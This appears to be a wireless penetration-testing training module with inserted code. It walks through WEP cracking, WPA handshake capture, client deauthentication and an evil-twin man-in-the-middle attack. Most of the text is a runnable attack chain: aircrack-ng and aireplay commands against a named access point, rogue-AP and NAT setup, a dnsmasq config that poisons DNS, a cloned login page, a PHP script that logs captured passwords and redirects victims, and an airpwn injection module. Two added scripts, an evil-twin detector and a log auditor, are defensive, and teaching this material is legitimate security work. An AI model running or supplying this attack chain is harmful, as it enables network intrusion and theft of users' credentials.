Don’t try to crack the WEP key until you have 200,000 IVs or more.
If you start too early, aircrack tends to spend too much time brute forcing keys and not properly applying the statistical techniques.
Start by trying 64 bit keys “aircrack-ng -n 64 captured-data.cap”.
If they are using a 64 bit WEP, it can usually be cracked in less than 5 minutes (generally less than 60 seconds) with relatively few IVs.
If you know the start of the WEP key in hexadecimal, you can enter it with the “-d” parameter.
Let us assume you know the WEP key is “0123456789” in hexadecimal; then you could use “-d 01” or “-d 0123”, etc.
Determining Network Topology: Network View
Once you’ve gained access to the actual wireless network, it helps to know the network topology, including the names of other computers and the devices on the network.
Network View is a small program that is designed to locate network devices and routes using TCP/IP, DNS, SNMP, port scanning, NetBIOS, and Windows Management Interface.
NetworkView will scan a complete 128-node Class C network in just a few minutes.
Network View
WarDriving and Wireless Penetration Testing with OS X
Apple OS X has excellent wireless support and several tools that make WarDriving and Wireless Local Area Network (WLAN) penetration testing easy.
WarDriving with KisMAC:
• KisMAC is a WarDriving and WLAN discovery and penetration testing tool available on any platform, and is available for free at http://kismac.binaervarianz.de/
• Most WarDriving applications provide the capability to discover networks in either active mode or passive mode; KisMAC provides both.
• KisMAC is unique because it also includes the functionality that a penetration tester needs to attack and compromise found networks.
KisMAC
KisMAC (cont’d)
KisMAC (cont’d)
KisMAC (cont’d)
KisMAC (cont’d)
Using a GPS
Most GPS devices capable of National Marine Electronics Association (NMEA) output work with KisMAC.
Many of these devices are only available with serial cables.
In most cases, you will need to purchase a serial-to-USB adapter in order to connect your GPS to your Mac.
Most of these adapters come with drivers for OS X; thus, make sure that the one you purchase includes these drivers.
You may be able to use a USB GPS cable and eliminate the need for a USB-to-serial adapter.
The GPS Store sells these cables at: http://www.thegpsstore.com/detail.asp?product_id=GL0997
Attacking WEP with KisMAC
Since you have determined that WEP is being used on your target wireless network, you now have to decide how you want to crack the key. KisMAC has three primary methods of WEP cracking built in:
• Wordlist attacks.
• Weak scheduling attacks.
• Bruteforce attacks.
To use one of these attacks, you have to generate enough initialization vectors (IVs) for the attack to work.
The easiest way to do this is by reinjecting traffic, which is usually accomplished by capturing an Address Resolution Protocol (ARP) packet, spoofing the sender, and sending it back to the access point.
This generates a large amount of traffic that can then be captured and decoded.
Deauthenticating Clients
Deauthenticating clients with KisMAC is simple.
Before you can begin deauthenticating, you must lock KisMAC to the specific channel that your target network is using.
If KisMAC is successful in its attempt to deauthenticate, the dialog changes to note the BSSID of the access point it is deauthenticating.
During the time the deauthentication is occurring, clients cannot use the wireless network.
Attacking WPA with KisMAC
Unlike WEP, which requires a large amount of traffic be generated in order to crack the key, cracking WPA only requires that you capture the four-way Extensible Authentication Protocol Over Local Area Network (EAPOL) handshake at authentication.
Unlike cracking WEP, the WPA attack is an offline dictionary attack, which means that when you use KisMAC to crack a WPA pre-shared key (or passphrase), you only need to capture a small amount of traffic; the actual attack can be carried out later, even when you are out of range of the access point.
To attempt a dictionary attack with KisMAC, you may need to deauthenticate clients.
When attempting dictionary attacks against WPA, everything can be done from one host, which will cause the client to disassociate from the network and force them to reconnect.
This requires the four-way EAPOL handshake to be transmitted again.
Attacking WPA with KisMAC (cont’d)
Brute-Force Attacks Against 40-bit WEP
KisMAC includes functionality to perform Bruteforce attacks against 40-bit WEP keys.
There are four ways KisMAC can accomplish this:
• All possible characters
• Alphanumeric characters only
• Lowercase letters only
• Newshams 21-bit attack
Each of these attacks is very effective, but also very time and processor intensive.
Wordlist Attacks
KisMAC provides the functionality to perform many types of wordlist attacks in addition to WPA attacks.
Cisco developed the Lightweight Extensible Authentication Protocol (LEAP) to help organizations concerned about vulnerabilities in WEP.
LEAP is also vulnerable to wordlist attacks similar to WPA.
KisMAC can perform wordlist attacks against LEAP.
Wordlist attacks can be launched against 40- and 104-bit Apple keys or 104-bit Message Digest 5 (MD5) keys in the same manner.
Mapping WarDrives with StumbVerter
StumbVerter takes input data from NetStumbler and plots the access points found on Microsoft MapPoint maps.
The logged WAPs will be shown with small icons, their color and shape relating to WEP mode and signal strength.
StumbVerter
MITM Attack
MITM Attack Design
A basic MITM attack connects a wireless client to a client’s (victim’s) access, and then forwards the traffic to the real (authorized) AP.
Components required:
The target—AP(s):
• To successfully perform a MITM attack, an attacker needs one or more target APs.
The victim—wireless client(s):
• Wireless clients or the victim(s) of the MITM attack have an initial wireless connection to the target AP.
• During the MITM attack, we will disconnect the victim from the target AP and have them associate to the MITM AP.
The MITM attack platform:
• The MITM attack platform provides access point functionality for wireless client(s) that were originally connected to a target AP.
• The MITM attack platform is configured with almost identical settings as the target AP, so that a client cannot tell the difference between the attacker’s access point and the real (authorized) access point.
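A platform cloned with “almost identical settings” still differs from the authorized AP in ways a beacon inventory exposes: an unknown BSSID, often no encryption, and a deliberately stronger signal. As an added example that is not code from this module, the check below is what a wireless IDS or a scheduled scan script can run over observed beacons; the allow-list, beacon records and clone BSSID are constructed.

```python
# Added example, not code from the EC-Council module: an evil-twin check a
# wireless IDS or a scan script runs over a beacon inventory to catch an AP
# cloned with "almost identical settings" to an authorized one. The allow-list
# and all beacon records are constructed for the demo; the authorized BSSID is
# the target AP from the module's example.
from dataclasses import dataclass


@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    privacy: bool   # capability "privacy" bit: WEP/WPA in use
    rssi: int       # signal strength in dBm as seen by the sensor


# Authorized APs per managed SSID (constructed allow-list)
AUTHORIZED = {"VisitorLAN": {"00:13:10:1e:65:42"}}


def find_evil_twins(beacons, authorized):
    """Return findings for BSSIDs that advertise a managed SSID but are not on
    the allow-list, with the reasons that make the clone suspicious."""
    by_ssid = {}
    for b in beacons:
        by_ssid.setdefault(b.ssid, []).append(b)

    findings = []
    for ssid, allowed in authorized.items():
        seen = by_ssid.get(ssid, [])
        legit = [b for b in seen if b.bssid.lower() in allowed]
        for b in seen:
            if b.bssid.lower() in allowed:
                continue
            reasons = ["unknown BSSID advertises managed SSID"]
            if legit:
                # compare against the strongest authorized AP seen in this scan
                ref = max(legit, key=lambda x: x.rssi)
                if ref.privacy and not b.privacy:
                    reasons.append("open network where authorized AP uses encryption")
                if b.rssi > ref.rssi:
                    reasons.append("stronger signal than authorized AP")
            findings.append({"ssid": ssid, "bssid": b.bssid.lower(), "reasons": reasons})
    return findings


# Constructed scan results: the legitimate AP, a clone on the same channel with
# no encryption and a stronger signal, and an unrelated network that is ignored.
SAMPLE_SCAN = [
    Beacon("VisitorLAN", "00:13:10:1E:65:42", 6, True, -61),
    Beacon("VisitorLAN", "00:AA:BB:CC:DD:EE", 6, False, -38),   # constructed clone
    Beacon("CoffeeShop", "00:DE:AD:BE:EF:01", 11, False, -70),  # constructed, not managed
]

if __name__ == "__main__":
    for f in find_evil_twins(SAMPLE_SCAN, AUTHORIZED):
        print(f["ssid"], f["bssid"], "; ".join(f["reasons"]))
```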
MITM Attack Design (cont’d)
MITM Attack Variables
To successfully perform a MITM attack against a wireless network, a few variables come into play.
The first variable is how the target AP is configured; specifically, what security features are enabled on the access point to prevent unauthorized access.
Before an attack can begin, the following tasks must be accomplished:
• Locate one or more AP(s) with wireless clients already attached.
• Identify the security controls and encryption scheme enabled on the target access point.
• Circumvent the security controls and associate to the target access point.
To establish connectivity and forward client traffic back to the target wireless network, you must be able to circumvent the security controls of the target AP.
If you can’t do this, you can’t forward the client’s traffic back to the target access point.
Hardware for the Attack: Antennas, Amps, and WiFi Cards
To successfully perform a MITM attack, you need several pieces of hardware and a few key software programs.
A typical MITM attack platform utilizes the following hardware components:
• A laptop computer with two Personal Computer Memory Card International Association (PCMCIA) slots.
• Two wireless Network Interface Cards (NICs).
• An external antenna (omni-directional preferred).
• A bi-directional amplifier (optional).
• Pigtails to connect the external antennae to the amplifier and wireless NIC.
• A handheld global positioning system (GPS) unit (optional).
• A power inverter.
Hardware for the Attack: Antennas, Amps, and WiFi Cards
Laptop
A laptop computer with two PC card (PCMCIA) slots, or one PCMCIA card slot and one mini-PCI slot, is required for the two wireless network cards.
The laptop serves as a clone of the target AP and provides connectivity back to the target wireless network.
The platform also runs a web server to host any spoofed websites discovered during an attack.
Therefore, the laptop should be well equipped to handle memory-intensive tasks.
Wireless Network Cards
Two wireless network cards are required for an attack platform.
One wireless card provides access point functionality for wireless client(s) (victims), and must be able to go into Host AP mode (also known as master mode).
The second wireless card provides connectivity to the target AP, and can be any 802.11 Border Gateway (B/G) card supported by Linux.
Wireless Card Interfaces for the Attack Platform
Choosing the Right Antenna
Wireless connectivity to the target AP and the wireless client(s) is essential in order for this attack to work.
You need to have a strong wireless signal broadcasting from the Host AP access point.
Therefore, choosing the right antenna is important.
There are two main types of antennas to consider for this attack: directional and omni-directional antennas.
Amplifying the Wireless Signal
A 2.4 gigahertz (GHz) amplifier is designed to extend the range of a 2.4 GHz radio device or an AP.
The amplifier is used in conjunction with an antenna to boost the signal of your MITM access point.
The intent is for the wireless signal access point to be stronger than the wireless signal of the target access point.
A typical amplifier has two connectors; depending on the connector type, one connection is made to the SENAO wireless card using a Multimedia Communications Exchange (MMCX) to N-Male pigtail, and the other connects to the omni-directional antenna.
Signal Strength
Identify and Compromise the Target Access Point
Before you can mount the MITM attack, you need to identify and compromise the target AP.
To gather preliminary data on the target, you need to go back to WarDriving basics and gain as much information about the target as you can.
Example:
Target network Service Set Identifier (SSID):
• VisitorLAN
Target network Basic Service Set Identifier (BSSID):
• 00:13:10:1E:65:42
Wireless client connected:
• 00:02:2D:2D:82:36
The target network encryption:
• WEP
The target network IP range:
• 192.168.1.0/24
Compromising the Target
You have identified a target access point; however, to perform your MITM attack you need to connect to the access point, and to do this you need to compromise the WEP key.
To crack the WEP key, you need to know the BSSID of the access point and the Media Access Control (MAC) address of a wireless client already connected.
Using the Aircrack-ng tools, you can begin the attack against the visiting LAN access point.
Crack the WEP key
To start airodump-ng on the wlan0 interface and capture any IVs to an output file called visitorlan-01.cap, use the following command:
• airodump-ng -w visitorlan -c 6 wlan0
Once airodump-ng is running, open a new terminal and start aireplay-ng with the following command:
aireplay-ng --arpreplay -b 00:13:10:1E:65:42 -m 68 -n 68 -d ff:ff:ff:ff:ff:ff -h 00:02:2D:2D:82:36 wlan
Aircrack-ng Cracked the WEP Key
Now you have all of the information required to connect to the target access point and begin your MITM attack.
The MITM Attack Laptop Configuration
Connecting to the target network:
• The wireless interface wlan0 is the internal mini-PCI card, which provides the connection to the target wireless network.
Using a series of commands, you can set up the wireless connection to connect to the target access point:
ifconfig wlan0 down
iwconfig wlan0 mode Managed ap 00:13:10:1E:65:42
iwconfig wlan0 key 6D617474686577303232333036
ifconfig wlan0 up
dhcpcd wlan0
The MITM Attack Laptop Configuration (cont’d)
wlan1 - Setting up the AP:
The second wireless card (i.e., wlan1) is the PCMCIA SENAO card, which acts as the Host AP access point. Configure the wlan1 interface to be an access point using the following commands:
ifconfig wlan1 down
iwconfig wlan1 mode Master essid VisitorLAN
iwconfig wlan1 key 6D617474686577303232333036
ifconfig wlan1 192.168.10.1 netmask 255.255.255.0
ifconfig wlan1 up
At this point, the MITM access point is configured on the wlan1 interface using the same settings as the target AP.
IP Forwarding and NAT using IPtables
You will need to enable IP forwarding and NAT, ultimately creating a wireless router/gateway.
IP forwarding provides the ability to have both wireless interfaces communicate and pass traffic to each other.
NAT allows us to translate the IP addresses used on one network (wlan0 - 192.168.1.x) to an IP address on another network (wlan1 - 192.168.10.x).
On the MITM attack laptop, the network associated to the wlan1 interface is the internal network, and the network associated to the wlan0 interface is the outside network.
When a client from the internal network (wlan1) connects to an IP located in the outside network (wlan0), the destination addresses are updated as they pass through the attack system.
Installing IPtables and IP Forwarding
IPtables is the command-line program used to configure the packet filtering rule sets and NAT.
Start the IPtables service using the following command:
• /etc/init.d/iptables start
Next, enable IP forwarding by editing the /etc/sysctl.conf file and changing the net.ipv4.ip_forward variable from 0 to 1.
/etc/sysctl.conf file
Establishing the NAT Rules
You know the IP address of the target access point is 192.168.1.0/24, and you established your IP address to be on the 192.168.10.0/24 network. The following commands define NAT rules:
Flush the current rules:
iptables -F
iptables -t nat -F
iptables -A FORWARD -i wlan0 -s 192.168.1.0/255.255.255.0 -j ACCEPT
iptables -A FORWARD -i wlan1 -s 192.168.10.0/255.255.255.0 -j ACCEPT
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
After the rules have been defined, save with the following command:
/etc/init.d/iptables save
Establishing IPtable NAT Rules (cont’d)
Dnsmasq
Dnsmasq is a lightweight, easily configured Domain Name System (DNS) forwarder and Dynamic Host Configuration Protocol (DHCP) server.
It serves two important functions on your attack platform: provides IP addresses to the wireless clients connecting to your access point, and gives us the ability to monitor and poison DNS queries.
This tool is very useful when redirecting the DNS requests for web applications to your spoofed web server.
Configuring Dnsmasq
Configuring Dnsmasq is reasonably simple.
The program has many options, but you only need to edit a few lines to get it up and running.
Edit the Dnsmasq configuration file located at /etc/dnsmasq.conf:
After you configure Dnsmasq, start it with the following command:
•/etc/init.d/dnsmasq start
DHCP and DNS requests are logged in /var/log/messages
To monitor incoming DHCP requests, you can check the /var/log/messages file with the following command:
• grep dnsmasq /var/log/messages | grep -i dhcp
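The grep above only filters the log; auditing a dnsmasq instance means reading the DHCP lease and DNS query lines together, and in particular spotting names dnsmasq answered from its own configuration (address=/…/ overrides, the mechanism used for poisoning) instead of forwarding. As an added example that is not code from this module, the parser below does that over constructed log lines; the syslog prefix, hostname "gw" and every sample line are assumptions shaped like dnsmasq's log-queries and log-dhcp output.

```python
# Added example, not code from the EC-Council module: a parser for the dnsmasq
# DHCP and DNS lines that land in /var/log/messages, of the kind an
# administrator uses to audit a dnsmasq instance: which clients took leases,
# what they resolved, and which names were answered from local config rather
# than forwarded upstream. The syslog prefix, hostname "gw" and all sample
# lines are constructed; the formats follow dnsmasq's log-queries/log-dhcp output.
import re

DHCP_RE = re.compile(
    r"dnsmasq-dhcp\[\d+\]: (?P<msg>DHCP[A-Z]+)\((?P<iface>\w+)\) "
    r"(?:(?P<ip>\d+\.\d+\.\d+\.\d+) )?(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
    r"(?: (?P<host>\S+))?$")
QUERY_RE = re.compile(r"dnsmasq\[\d+\]: query\[(?P<qtype>\w+)\] (?P<name>\S+) from (?P<client>\S+)$")
CONFIG_RE = re.compile(r"dnsmasq\[\d+\]: config (?P<name>\S+) is (?P<ip>\S+)$")
FORWARD_RE = re.compile(r"dnsmasq\[\d+\]: forwarded (?P<name>\S+) to (?P<server>\S+)$")


def parse_line(line):
    """Classify one syslog line; return a dict with a 'kind' key, or None."""
    for kind, rx in (("dhcp", DHCP_RE), ("query", QUERY_RE),
                     ("config", CONFIG_RE), ("forwarded", FORWARD_RE)):
        m = rx.search(line)
        if m:
            return {"kind": kind, **m.groupdict()}
    return None


def summarize(lines):
    """Build lease, query and answer tables from dnsmasq log lines."""
    leases = {}          # mac -> (ip, hostname) taken from DHCPACK lines
    queries = []         # (client ip, name, qtype)
    local_answers = {}   # name -> ip answered from dnsmasq's own config
    forwarded = set()    # names handed to an upstream resolver
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["kind"] == "dhcp" and rec["msg"] == "DHCPACK":
            leases[rec["mac"]] = (rec["ip"], rec["host"])
        elif rec["kind"] == "query":
            queries.append((rec["client"], rec["name"], rec["qtype"]))
        elif rec["kind"] == "config":
            local_answers[rec["name"]] = rec["ip"]
        elif rec["kind"] == "forwarded":
            forwarded.add(rec["name"])
    return {"leases": leases, "queries": queries,
            "local_answers": local_answers, "forwarded": sorted(forwarded)}


def locally_overridden(summary):
    """Names clients asked for that dnsmasq answered itself instead of
    forwarding: the list to review when auditing for unexpected overrides."""
    asked = {name for _, name, _ in summary["queries"]}
    return sorted(asked & set(summary["local_answers"]))


# Constructed sample, shaped like the output of `grep dnsmasq /var/log/messages`
SAMPLE_LOG = """\
Nov  8 10:15:31 gw dnsmasq-dhcp[2231]: DHCPDISCOVER(wlan1) 00:02:2d:2d:82:36
Nov  8 10:15:31 gw dnsmasq-dhcp[2231]: DHCPOFFER(wlan1) 192.168.10.10 00:02:2d:2d:82:36
Nov  8 10:15:31 gw dnsmasq-dhcp[2231]: DHCPREQUEST(wlan1) 192.168.10.10 00:02:2d:2d:82:36
Nov  8 10:15:31 gw dnsmasq-dhcp[2231]: DHCPACK(wlan1) 192.168.10.10 00:02:2d:2d:82:36 laptop
Nov  8 10:15:40 gw dnsmasq[2231]: query[A] www.example.com from 192.168.10.10
Nov  8 10:15:40 gw dnsmasq[2231]: forwarded www.example.com to 192.168.1.1
Nov  8 10:15:41 gw dnsmasq[2231]: query[A] mail.example.net from 192.168.10.10
Nov  8 10:15:41 gw dnsmasq[2231]: config mail.example.net is 192.168.10.2
Nov  8 10:15:42 gw kernel: wlan1: associated
""".splitlines()

if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print("leases:", s["leases"])
    print("answered from local config:", locally_overridden(s))
```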
/etc/dnsmasq.conf
Viewing DHCP Requests from a Dnsmasq Log File
Viewing DNS Queries from a Dnsmasq Log File
Airpwn
Airpwn is a supporting tool for 802.11 (wireless) packet injection.
It spoofs 802.11 packets to verify whether the access point is valid or not.
You can send the data to the AP (access point) and also get the reply from the AP while using a traditional 802.11 network.
The client accepts Airpwn's packet in place of the AP's, because Airpwn, controlling the server side of the communication, is almost guaranteed to deliver its packet before the AP does.
Configuration Files
Airpwn configuration files are simple text files with one or more request/response blocks.
Request/response blocks start with the begin command followed by:
• A match expression.
• An optional ignore expression.
• A response filename.
A single configuration file is transmitted to Airpwn and also to command line parameters while processing.
Configuration includes one or more files and each file contains some standards.
Using Airpwn on WEP-Encrypted Networks
Airpwn can decode WEP traffic and send a WEP-encrypted response.
Use Airpwn with a WEP-protected network by including the network’s key to the Airpwn command line through the -k keystring option.
Include multiple keys to the Airpwn command by using the -k option number of times, as Airpwn works at the same time on multiple networks.
keystring frames the WEP key.
Airpwn: Scripting
Airpwn should be configured to return the dynamic response data from a Python script in place of static response files.
It can use a script’s output as the response: pyscript pythonmodule is used in place of response.
It supports the airpwn_response function of your module containing an argument.
The airpwn_response function should retrieve with response data or else send “None”, if there is no response to send.
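As an added, worked example that is not airpwn's own code, the following Python module ties the configuration-file layout described above (begin, match, ignore) to the pyscript mechanism. The config block in the docstring is an assumed instance of that layout; the match and ignore expressions, the module name inject_login, and the injected page are all illustrative. The slides say only that airpwn_response receives one argument and returns data or None; this example assumes the argument is the raw HTTP request payload that the match expression was tested against.

```python
r"""Airpwn pyscript module (added example, not part of airpwn).

Assumed matching config file, in the begin/match/ignore layout described
on the slides, with 'pyscript' replacing the static 'response' line:

    begin inject_login
    match ^(GET|POST) [^ ]+ HTTP/1\.[01]
    ignore ^GET [^ ?]+\.(jpg|jpeg|gif|png|ico|css|js)
    pyscript inject_login

airpwn calls airpwn_response(request) with the payload of each matching
packet and injects whatever string it returns; None means inject nothing.
"""
import re

# Extensions for which we inject nothing. The config's 'ignore' line already
# covers these; checking again keeps the module safe if the config omits it.
STATIC_EXT = re.compile(r"\.(jpe?g|gif|png|ico|css|js)(\?.*)?$", re.IGNORECASE)

# HTTP request line: method, path, version. Tolerates a trailing CR.
REQUEST_LINE = re.compile(r"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]\r?$")


def parse_request(raw):
    """Return {'method', 'path', 'host'} for an HTTP request payload, else None."""
    if isinstance(raw, bytes):
        raw = raw.decode("latin-1", "replace")
    lines = raw.split("\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return None
    host = ""
    for line in lines[1:]:
        line = line.rstrip("\r")
        if not line:
            break  # blank line ends the headers
        name, _, value = line.partition(":")
        if name.strip().lower() == "host":
            host = value.strip()
    return {"method": m.group(1), "path": m.group(2), "host": host}


def build_response(body, status="200 OK", content_type="text/html"):
    """Wrap body in a complete HTTP/1.1 response.

    Connection: close makes the browser stop waiting for more data, so the
    real server's later reply is thrown away instead of being appended."""
    return (
        "HTTP/1.1 %s\r\n"
        "Content-Type: %s\r\n"
        "Content-Length: %d\r\n"
        "Connection: close\r\n"
        "\r\n%s" % (status, content_type, len(body), body)
    )


def airpwn_response(request):
    """Entry point airpwn calls for every packet that matched the block.

    Returns the data to inject, or None to let the real reply through."""
    req = parse_request(request)
    if req is None or STATIC_EXT.search(req["path"]):
        return None
    # Dynamic content: the page names the request it is answering, which a
    # static response file cannot do.
    body = (
        "<html><body><h1>Injected by airpwn</h1>"
        "<p>%s %s on host %s was answered by the attacker, not the AP.</p>"
        "</body></html>"
        % (req["method"], req["path"], req["host"] or "(no Host header)")
    )
    return build_response(body)
```

Airpwn's Python binding dates from the Python 2 era, where str is a byte string; the module avoids anything that differs between Python 2 and 3, and accepts bytes as well as str, so it loads under either.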
Apache, PHP Hypertext Preprocessor, and Virtual Web Servers
Apache is a versatile and configurable web server that lets you host spoofed web applications on the MITM attack laptop.
During the MITM attack you create a spoofed login page with Apache and PHP to capture user credentials.
Command to start Apache:
• /etc/init.d/apache2 start
During the MITM attack, spoof a web page and host it on your attack platform.
In a real scenario, you might want to set up multiple websites to increase the chance of capturing user credentials.
Virtual Directories
To host multiple instances or websites on your web server, define Apache virtual hosts in the /etc/apache2/vhosts.d/00_default_vhost.conf file (the Gentoo layout used throughout this module).
You can define multiple IP-based virtual hosts in 00_default_vhost.conf with the following directives, one <VirtualHost> block per site:

    <VirtualHost 192.168.10.2:80>
        DocumentRoot "/var/www/localhost/htdocs/site1/"
    </VirtualHost>
    <VirtualHost 192.168.10.3:80>
        DocumentRoot "/var/www/localhost/htdocs/site2/"
    </VirtualHost>
    <VirtualHost 192.168.10.4:80>
        DocumentRoot "/var/www/localhost/htdocs/site3/"
    </VirtualHost>
Virtual Directories (cont’d)
In the previous slide, each virtual host is bound to a separate IP address.
For this to work, each of those addresses has to exist on the attack laptop, so define an alias (virtual interface) for each one with the following commands:

    ifconfig wlan1:0 192.168.10.2 netmask 255.255.255.0
    ifconfig wlan1:1 192.168.10.3 netmask 255.255.255.0
    ifconfig wlan1:2 192.168.10.4 netmask 255.255.255.0

The aliases go on wlan1, the interface serving your rogue access point, because that is where the victim clients (which receive 192.168.10.x addresses from Dnsmasq) send their web traffic.
Clone the Target Access Point and Begin the Attack
Once you have finished configuring your MITM attack laptop, you can bring up the wireless connections and begin the attack.
Start the Wireless Interfaces
After you are done configuring the wireless configuration files, start the wireless interfaces and establish your network connections.
Establish the connection from wlan0 to the target wireless network using the command:
• /etc/init.d/net.wlan0 start
Next, start your other wireless interface (wlan1), the one that broadcasts your cloned access point, using the command:
• /etc/init.d/net.wlan1 start
Start the Wireless Interfaces (cont'd)
Deauthenticate Clients Connected to the Target Access Point
To get the victim wireless clients to connect to your access point, you can wait until they disconnect and reconnect on their own, or you can force them to reconnect.
To force the clients off the target wireless network, deauthenticate them from the target access point using a second computer (for example with aireplay-ng from the aircrack-ng suite). 802.11 deauthentication frames carry no authentication, so any card in injection range can send them in the access point's name.
Wait for the Client to Associate to Your Access Point
If all goes well and your access point's signal is stronger than the target network's access point, you should see the wireless client connect to your access point.
When a wireless client associates to your access point, you need to assign it an IP address.
Dnsmasq provides the client with an IP address from the DHCP allocations defined in the /etc/dnsmasq.conf file.
The client uses the IP address of your access point as its gateway and primary DNS server, which is what lets you answer its DNS queries yourself in the following steps.
Spoof the Application
The goal of the spoofed application is to have the user log in to your web page instead of the real (authorized) one.
This is not difficult if the site does not use SSL and relies on form-based authentication: the browser has no way to tell your copy from the original.
A quick and easy way to spoof the site is to download the target web page with wget and modify the source:
wget -r http://192.168.1.30
Once you have all the files associated with the web page, modify the source HTML and add the code needed to capture the username and password form variables.
Modify the Page
When you edit the index.html file in your favorite text editor, keep the visible content of the page the same so that it looks identical to the user; only what happens to the submitted form changes.
Example Page

    <html>
    <body>
    <h1>Intranet Login</h1>
    <form action="login.php" method="post">
    <table border=0>
    <tr><td>Username:</td><td><input type=text name="username" size=30></td></tr>
    <tr><td>Password:</td><td><input type="password" name="password" size=30></td></tr>
    </table>
    <input type="submit" value="Submit">
    </form>
    </body>
    </html>
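Added example, not part of the original material: before writing the backend you need the form's action, method and field names. Reading them by eye works for one page, but the small parser below does the same for every page wget pulled down and tells you which inputs carry the credentials. SAMPLE_HTML is a constructed copy of the example page above, and the heuristic in credential_form (the text-type input submitted just before the password field is the username) is this example's own assumption.

```python
from html.parser import HTMLParser

# Constructed sample: a copy of the downloaded intranet login page as shown
# on the slide (not a real capture).
SAMPLE_HTML = """<html><body>
<h1>Intranet Login</h1>
<form action="login.php" method="post">
<table border=0>
<tr><td>Username:</td><td><input type=text name="username" size=30></td></tr>
<tr><td>Password:</td><td><input type="password" name="password" size=30></td></tr>
</table>
<input type="submit" value="Submit">
</form>
</body></html>"""


class FormScraper(HTMLParser):
    """Collects every <form> with its action, method and named <input> fields."""

    def __init__(self):
        HTMLParser.__init__(self)
        self.forms = []
        self._form = None  # form currently being read, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {
                "action": a.get("action", ""),
                "method": (a.get("method") or "get").lower(),
                "fields": [],
            }
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("name"):
            # Inputs without a name (the submit button) are never posted.
            self._form["fields"].append(
                {"name": a["name"], "type": (a.get("type") or "text").lower()}
            )

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def extract_forms(html):
    """Parse an HTML document and return its forms in document order."""
    parser = FormScraper()
    parser.feed(html)
    parser.close()
    return parser.forms


def credential_form(forms):
    """Pick the login form: the first form with a password field, taking the
    text-like field submitted before it as the username (assumed heuristic).

    Returns (action, method, username_field, password_field) or None."""
    for form in forms:
        names = [f["name"] for f in form["fields"]]
        types = [f["type"] for f in form["fields"]]
        if "password" not in types:
            continue
        pw_idx = types.index("password")
        user = None
        for i in range(pw_idx - 1, -1, -1):
            if types[i] in ("text", "email", "tel"):
                user = names[i]
                break
        return form["action"], form["method"], user, names[pw_idx]
    return None
```

Run it over every index.html under the directory wget created; the returned action and method are exactly what the backend in the next slides has to accept, and the field names are the $_POST keys it reads.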
Example Page (cont'd)
Now that you know the names of the form variables (username and password), the method (POST), and the action (login.php), you can create your own backend login.php page.
Using a simple PHP page, capture the user credentials and redirect the client back to the original source of the web page, so the user lands on the real site and has no reason to suspect anything.
login.php page

    <?php
    // Read the submitted form variables (the names come from the spoofed page).
    $username = $_POST['username'];
    $password = $_POST['password'];

    // Append them to a log file; it must be writable by the Apache user.
    $log = '/var/log/apache2/captured.txt';
    $user_info = "Username:$username Password:$password" . "\n";
    $fp = fopen($log, "a");
    fwrite($fp, $user_info);
    fclose($fp);

    // Send the browser on to the real site so the login appears to proceed normally.
    $URL = "http://192.168.1.30";
    header("Location: $URL");
    exit;
    ?>
Redirect Web Traffic Using Dnsmasq
Once your fake login page is functional, you can poison the client's DNS traffic to redirect any queries for the target's name to your malicious login page.
To do this, modify the address variable of your Dnsmasq configuration file to add the DNS name of your target and the IP address of the web server hosting the spoofed page:
• address=/login.intranet/192.168.10.1
Because your access point is the client's DNS server, Dnsmasq answers this name itself and never forwards the query, so the client has no way to learn the real address.
Once you update the address variable, restart the Dnsmasq service to enable the change:
• /etc/init.d/dnsmasq restart
At this point, when a client connected to your access point requests the login.intranet web page, the name resolves to your web server, which is hosting the spoofed login page. The IP address in the address line must be one on which Apache serves the spoofed site: the access point's own address, or one of the virtual host addresses defined earlier.
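A complete /etc/dnsmasq.conf for the rogue access point, added here as an example rather than taken from the original material. It combines the DHCP allocation described under "Wait for the Client to Associate to Your Access Point" with the address line above. The interface name wlan1, the 192.168.10.0/24 range with the access point at .1, and the upstream resolver 192.168.1.1 (assumed to be the target network's own DNS server, reached through wlan0) are assumptions for this lab.

```conf
# Serve DHCP and DNS only on the rogue access point's interface.
interface=wlan1
bind-interfaces

# Hand out 192.168.10.x addresses to victim clients; the AP itself is .1
# and is advertised as both default gateway and DNS server.
dhcp-range=192.168.10.100,192.168.10.200,12h
dhcp-option=option:router,192.168.10.1
dhcp-option=option:dns-server,192.168.10.1

# Poisoned entry: the target's login host (and any subdomain of it)
# resolves to the machine hosting the spoofed page.
address=/login.intranet/192.168.10.1

# Every other name is forwarded upstream so the victim's remaining
# traffic keeps working and nothing looks broken. (assumed resolver)
no-resolv
server=192.168.1.1

# Log queries and leases so you can watch which names the clients ask for.
log-queries
log-dhcp
```

Restart Dnsmasq after editing the file; a client that already holds a lease keeps the cached answer for login.intranet only as long as the record's TTL, so the poisoned entry takes effect on its next lookup.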
Summary
In this module, we reviewed advanced techniques for wireless penetration testing.
We discussed various wireless concepts, such as its components and standards.
We reviewed Wired Equivalent Privacy (WEP), its issues, flaws, and security.
We discussed various wireless security technologies such as WPA, EAP, and TKIP.
We discussed different attacks and tools such as War Driving, NetStumbler, and MITM attacks.